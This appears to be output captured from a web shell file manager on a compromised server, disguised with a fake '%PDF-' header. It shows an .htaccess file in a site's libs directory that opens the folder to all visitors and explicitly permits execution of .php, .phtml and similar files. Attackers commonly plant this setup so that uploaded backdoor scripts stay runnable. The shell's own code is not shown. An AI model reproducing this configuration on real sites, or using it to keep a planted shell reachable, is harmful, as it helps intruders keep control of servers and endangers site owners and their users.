%PDF- %PDF-
| Direktori : /var/www/projetos/davidrrsoares.com.br/libs/ |
| Current File : //var/www/projetos/davidrrsoares.com.br/libs/.htaccess |
# Apache 2.2
<IfModule !mod_authz_core.c>
Order allow,deny
Allow from all
</IfModule>
# Apache 2.4
<IfModule mod_authz_core.c>
Require all granted
</IfModule>
<IfModule rewrite_module>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.html
</IfModule>
<FilesMatch ".*\.(php|html|phtml|fLA|txt)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<IfModule mod_authz_core.c>
<FilesMatch "\.php$">
Require all granted
</FilesMatch>
</IfModule>
<FilesMatch "\.php$">
Order allow,deny
allow from all
</FilesMatch>